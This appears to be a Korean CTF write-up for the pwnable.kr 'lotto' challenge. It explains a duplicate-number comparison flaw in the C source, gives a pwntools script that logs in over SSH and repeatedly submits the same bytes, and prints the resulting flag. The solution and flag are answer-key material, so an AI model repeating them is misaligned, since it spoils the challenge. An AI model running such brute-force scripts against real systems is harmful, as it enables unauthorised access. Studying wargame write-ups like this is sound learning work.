Pwnable (13. lotto)

이번 포스트에서는 Pwnable의 lotto 문제에 대해 다루겠다.

 

---

문제 코드는 다음과 같다.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>

unsigned char submit[6];

void play(){

        int i;
        printf("Submit your 6 lotto bytes : ");
        fflush(stdout);

        int r;
        r = read(0, submit, 6);

        printf("Lotto Start!\n");
        //sleep(1);

        // generate lotto numbers
        int fd = open("/dev/urandom", O_RDONLY);
        if(fd==-1){
                printf("error. tell admin\n");
                exit(-1);
        }
        unsigned char lotto[6];
        if(read(fd, lotto, 6) != 6){
                printf("error2. tell admin\n");
                exit(-1);
        }
        for(i=0; i<6; i++){
                lotto[i] = (lotto[i] % 45) + 1;         // 1 ~ 45
        }
        close(fd);

        // calculate lotto score
        int match = 0, j = 0;
        for(i=0; i<6; i++){
                for(j=0; j<6; j++){
                        if(lotto[i] == submit[j]){
                                match++;
                        }
                }
        }

        // win!
        if(match == 6){
                system("/bin/cat flag");
        }
        else{
                printf("bad luck...\n");
        }

}

void help(){
        printf("- nLotto Rule -\n");
        printf("nlotto is consisted with 6 random natural numbers less than 46\n");
        printf("your goal is to match lotto numbers as many as you can\n");
        printf("if you win lottery for *1st place*, you will get reward\n");
        printf("for more details, follow the link below\n");
        printf("http://www.nlotto.co.kr/counsel.do?method=playerGuide#buying_guide01\n\n");
        printf("mathematical chance to win this game is known to be 1/8145060.\n");
}

int main(int argc, char* argv[]){

        // menu
        unsigned int menu;

        while(1){

                printf("- Select Menu -\n");
                printf("1. Play Lotto\n");
                printf("2. Help\n");
                printf("3. Exit\n");

                scanf("%d", &menu);

                switch(menu){
                        case 1:
                                play();
                                break;
                        case 2:
                                help();
                                break;
                        case 3:
                                printf("bye\n");
                                return 0;
                        default:
                                printf("invalid menu\n");
                                break;
                }
        }
        return 0;
}

## 문제 해석 :

로또 번호를 맞추는 게임이다. 1~45 범위 중 사용자가 입력한 6개의 수가 시스템이 "/dev/urandom"을 통해 생성한 6개의 난수와 모두 일치하다면 flag를 획득할 수 있는 것으로 보인다.

## 문제 풀이 :

play() 부분을 위주로 살펴보면 다음과 같은 코드가 존재한다.

// calculate lotto score
int match = 0, j = 0;
for(i=0; i<6; i++){
	for(j=0; j<6; j++){
		if(lotto[i] == submit[j]){
			match++;
		}
	}
}

사용자가 입력한 수와 시스템이 생성한 수를 비교하는 코드 부분이다. 여기서 자세히 살펴보면 사용자가 입력한 모든 수를 다 한 번씩 검증하고 있다. 예를 들면, 사용자의 입력 = 111111, 시스템이 생성한 난수 = 123456일경우, if문이 항상 첫번째 인덱스(1)에서 True를 반환하기 때문에 하나의 수만 맞춰도 6개의 수를 맞춘 것과 같다.

## 최종 결과 : 

### 공격 코드 :

from pwn import *

sh = ssh('lotto', 'pwnable.kr', password='guest', port=2222)
p = sh.process('./lotto')

key = 'bad'
key_byte = key.encode('utf-8')

for i in range(1000):
	p.recv()
	p.sendline("1")
	p.recv()
	p.sendline("######")
	_, ans = p.recvlines(2)
	if key_byte not in ans:
		print(ans)
		break

### 실행 결과 :

공격 실행

Flag = sorry mom... I FORGOT to check duplicate numbers... :(